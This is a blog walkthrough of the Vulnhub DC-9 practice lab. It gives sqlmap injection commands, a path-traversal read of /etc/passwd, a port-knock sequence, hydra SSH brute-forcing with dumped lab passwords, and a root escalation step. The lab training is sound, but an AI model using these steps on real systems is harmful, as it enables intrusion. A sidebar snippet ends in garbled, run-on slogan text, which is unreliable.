【Vulnhub】DC-9

最新推荐文章于 2025-07-29 20:27:35 发布
最新推荐文章于 2025-07-29 20:27:35 发布
阅读量125 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Vulnhub 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhangshuaiijie/article/details/131259411
文章描述了一次针对有限开放端口(22和80)的网站渗透过程,通过SQL注入发现数据库信息,利用knockd服务进行端口敲门解锁SSH,然后使用Hydra进行密码爆破,最终实现权限提升并找到隐藏目录和密码文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息收集

只开了两个端口,22和80,访问网站,不是框架

在这里插入图片描述
逛了一下,功能就是显示员工信息,有模糊查询,有登录
看来看去也就查询页有可能有漏洞,登录页连用户名都不知道不可能直接爆破,那花的时间太长了,查询页最可能就是sql注入漏洞
post提交方式,search变量
在这里插入图片描述

网站渗透

sqlmap -u 'http://192.168.83.141/results.php' --data 'search=1' --dbs --batch
判断是否有post方式的注入
--data post方式提交

search就是注入点

在这里插入图片描述
然后一把嗦

sqlmap -u 'http://192.168.83.141/results.php' --data 'search=1' -D Staff --tables --batch
sqlmap -u 'http://192.168.83.141/results.php' --data 'search=1' -D Staff -T Users --dump --batch
856f5de590ef37314e7c3bdf6f8a66dc | admin

看着像MD5,解密一下
很多网站这个是付费的,这个免费https://www.somd5.com/
transorbital1
在这里插入图片描述
登录一下,多了这一页
在这里插入图片描述
这个页面是添加员工信息的,看能不能写一段php代码进去解析掉
试过了,并不能写进去只会被注释掉,不知道什么原理
在这里插入图片描述
看第二个点

File does not exist

文件包含,尝试一下

http://192.168.83.141/manage.php/?file=../../../../../../../etc/passwd

在这里插入图片描述
后面我也不会了

ssh

因为nmap扫描到有22端口,但是流量都被过滤了,怀疑有knockd服务
knockd服务,即端口敲门服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。一般配置文件在/etc/knockd.conf中,所以尝试读取一下文件,确实存在该配置

在这里插入图片描述

 使用kali系统下的knockd工具:
安装:
sudo apt install -y knockd
敲门:
knock 192.168.83.141 7469 8475 9842
验证
nmap -p 22 192.168.83.141

然后靶机的ssh就open了
在这里插入图片描述
sql注入:数据库user下有一个UserDetails表里面有用户名和密码,得到用户名密码字典用hydra爆破

hydra -L username.txt -P password.txt ssh://192.168.83.141

±—±-----------±--------------±--------------------±----------±----------+
| id | lastname | password | reg_date | username | firstname |
±—±-----------±--------------±--------------------±----------±----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
±—±-----------±--------------±--------------------±----------±----------+

在这里插入图片描述

[22][ssh] host: 192.168.232.136 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.232.136 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.232.136 login: janitor password: Ilovepeepee

用ssh登录

ssh username@192.168.83.141

有一个隐藏目录,里面放了一个密码文件,在去hydra爆破一下

[22][ssh] host: 192.168.232.136 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.232.136 login: fredf password: B4-Tru3-001

在这里插入图片描述
再次登录,fredf 账户能以root权限操作
在这里插入图片描述
打开是部分乱码,看不懂,上两级有一个test.py
大概就是将参数1的内容写入参数2中,接下来尝试进行提权。
用openssl工具创建一个本地的加密用户

openssl passwd -1 -salt admin admin
-1 #使用md5加密算法
-salt #自动锚入一个随机参数作为文件内容加密

然后切换admin账户,是root权限,读取flag

总结

这个靶机难很多,前面网站渗透还能行,主要是跨度太大很难想到正确解决方法

Vulnhub DC-9靶机实战
kiritio1024513的博客
01-13 1280
比较接近实战的一次靶机渗透,收获比较大,最后还给了一个比较好的工具
Vulnhub - DC-1
qq_46081990的博客
03-14 502
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub DC-9
Pai_Space
04-11 3335
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
Vulnhub DC-7
Pai_Space
03-26 5451
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
Vulnhub靶场----9DC-9
七天
03-03 918
Vulnhub-DC9
VulnHub DC-1
烟敛寒林的博客
09-05 509
靶机配置及说明 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/靶机:DC1 (VirtualBox) IP:192.168.10.103攻击机:Kali(VMware ) IP:192.168.10.104说明:DC1需要找到5个flag,最终目标是在root的主目录中找到并读取该flag 关于每个flag的知识点 1、msf的熟练使用以及搜索可利用漏洞(Drupal)2、留意目标网站的配置文件(more慢慢查看别错过重要信息...
Vulnhub DC-5
Pai_Space
02-20 348
Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with.
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2419
vulnhub DC-4靶机实战
Vulnhub DC-8
Pai_Space
04-05 1071
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
vulnhub靶场--DC-1-9
金灰的博客
03-04 1401
免责声明:本文仅作分享!凌乱notes.
Vulnhub DC-8靶机攻击实战(一)
初学者
01-16 1291
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8742
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux救援模式之应用篇
最新发布
FED_AF的博客
07-29 676
Linux系统救援操作指南 本文总结了Linux系统救援的常用操作流程,包括: 文件系统挂载与访问:通过fdisk/lsblk识别分区,创建挂载点并挂载根分区及其他关键分区(/boot、/home),必要时挂载虚拟文件系统进行chroot操作。 文件系统检查与修复:针对ext/xfs/btrfs等不同文件系统的检查(fsck/xfs_repair)和修复方法,包括超级块损坏、日志损坏等特殊情况的处理。 GRUB引导修复:详细说明在BIOS和UEFI模式下重新安装GRUB的步骤,包括分区挂载、chroot环境
5.Linux ssh远程登录配置及sftp,scp命令
xie52的博客
07-28 450
客户端发送公钥,服务器匹配然后把公钥发送回客户端,客户端再用密钥算法加密发送给服务器,服务器解密匹配后完成会话。:先本地文件 → 后远程路径。:先远程文件 → 后本地路径。
2.Linux 网络配置
xie52的博客
07-25 630
将ens33网卡ip地址修改为192.168.100.20,网关设置为192.168.100.254,dns设置为114.114.114.114 ipv4设置为手动配置,自动连接。如果目标是网络:route add -net 目标网络 netmask 网络掩码 gw 网关地址 dev 接口。如果目标是主机:route add -host 目标主机的IP地址 gw 网关地址 dev 接口。如果目标是一个网段,那么可以有网关,也可以没有网关。查看ip转发是否开启,如果开启则结果为1,反之为0。
【内网穿透】使用FRP实现内网与公网Linux/Ubuntu服务器穿透&项目部署&多项目穿透方案
@LPX
07-25 753
本文对Linux/Ubuntu服务器如何实现内网穿透进行了详细的介绍,主要使用FRP实现内网与公网服务器的穿透,同时介绍了多项目穿透方案。
protobuf2.5.0 arm_linux
GAORUI_GAO的博客
07-29 92
【代码】protobuf2.5.0 arm_linux
练习实践-基础设施-文件共享-windows和linux之间的文件共享-smb服务搭建
文字记录时间
07-25 878
linux下smb服务的搭建,客户端的共享文件效果验证实践记录;
vulnhub dc-4
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以基于已知的信息推测其可能涉及的内容。 #### 下载地址 通常情况下,VulnHub 提供的虚拟机镜像可以通过访问官网并搜索对应的名称来获取。例如,在浏览器中输入 `https://www.vulnhub.com` 并搜索关键词 **DC-4** 即可找到该靶场的相关描述以及下载链接[^1]。 需要注意的是,正如引用所提到的内容一样,下载和使用这些虚拟机时需注意责任声明:通过下载此虚拟机,使用者接受因意外造成的任何损害的责任[^4]。 #### Walkthrough 概述 尽管没有针对 DC-4 的特定引用,但从其他 DC 靶场的经验来看,常见的攻击路径包括但不限于以下几个方面: 1. **端口扫描** 发现目标主机开放的服务及其版本信息是第一步。例如,引用提到了某台机器上运行着 SSH (22) 和 HTTP (80)[^3]。这表明初始阶段应执行全面的网络侦察工作以识别潜在入口点。 2. **Web 应用程序漏洞利用** 如果存在 Web 登录界面,则尝试寻找注入点或其他安全缺陷成为关键环节之一。比如 SQL 注入工具 sqlmap 可用于自动化检测数据库层面上的安全隐患[^5]: ```bash sqlmap -u "http://<target>/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ``` 3. **文件上传或目录遍历** 利用不当配置实现远程代码执行也是常见手法之一。如 wfuzz 工具可以帮助枚举敏感文件位置[^2]: ```bash wfuzz --hl 50 -b "PHPSESSID=<session_id>" -w /usr/share/wfuzz/wordlist/general/common.txt http://<target>/manage.php?FUZZ=../../../../../../../../../etc/passwd ``` 4. **权限提升** 成功获得低级 shell 后还需进一步探索如何升级至更高权限状态。此时可能会涉及到本地提权技术的应用场景分析。 ```python import requests def check_web_vulnerability(url): try: response = requests.get(url) if &#39;vulnerable&#39; in response.text.lower(): print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious vulnerabilities found.") except Exception as e: print(f"[!] Error occurred: {e}") check_web_vulnerability(&#39;http://example.com&#39;) ``` 上述脚本仅为示例用途展示基本功能逻辑框架结构设计思路方法论探讨交流学习参考资料分享传播正能量促进共同进步成长成才之路越走越宽广美好未来值得期待憧憬向往追求梦想成就辉煌人生价值意义非凡重要无比珍贵难得机遇挑战自我突破极限再创佳绩续写传奇篇章留下永恒记忆铭刻历史丰碑树立行业标杆引领时代潮流风尚前沿科技趋势洞察先机抢占制高点掌控全局主动权赢得最终胜利荣光加冕王者归来笑傲江湖纵横捭阖挥洒自如游刃有余得心应手驾轻就熟熟能生巧百炼成钢千锤百炼精益求精臻于完美极致境界登峰造极无懈可击无可挑剔堪称典范模版样板工程示范作用显著影响深远广泛流传久远世代相传薪火相继生生不息绵延不断永葆青春活力焕发勃勃生机盎然春意浓烈热烈欢迎加入我们共创辉煌明天!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值